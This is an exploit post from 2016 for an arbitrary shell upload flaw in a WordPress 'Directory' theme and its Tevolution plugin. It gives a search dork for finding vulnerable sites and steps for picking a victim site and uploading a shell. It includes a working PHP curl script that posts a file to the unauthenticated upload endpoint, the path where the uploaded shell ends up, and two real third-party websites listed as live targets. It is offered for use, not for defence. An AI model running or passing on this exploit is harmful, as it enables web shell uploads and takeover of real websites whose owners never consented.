######################
# Exploit Title : Wordpress Theme Directory Arbitrary Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:/wp-content/themes/Directory/
# Vendor Homepage : https://templatic.com/
# version : 2.0.16 - 2.0.14  & maybe high or lower
# Tested on: [ BackBox ]
# skype:xbadgirl21
# Date: 15/08/2016
# video Proof : https://youtu.be/eVjW6rnaoSY
######################
# [+] USAGE :
######################
# 1.- Download or Copy the Exploit C0des
# 2.- Use Dork and Choose One Of the Website
# 3.- Edit The Script
# 4.- Upload Your File : shell.php.jpg or shell.php.txt
######################
# [+] Exploit:
######################
<?php
$uploadfile="x21.PhP.Txt";  ///xBADGIRL21 ! Removing my name Doesn't mean
you are the Founder or Owner of this ^_^
$ch = curl_init("
http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
######################
# [+] Dev!l Path :
######################
#
http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt
######################
# [+] Live Demo :
######################
# http://guiagronicaragua.com/wp-content/themes/Directory/
# http://ilovehermanus.co.za/rv//wp-content/themes/Directory/
######################
# Discovered by : xBADGIRL21 - Unkn0wN
# Greetz : All Mauritanien Hackers - NoWhere
#######################
### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't
Want me to Write His Name
# so I Just Write the Exploit C0des ...........
#######################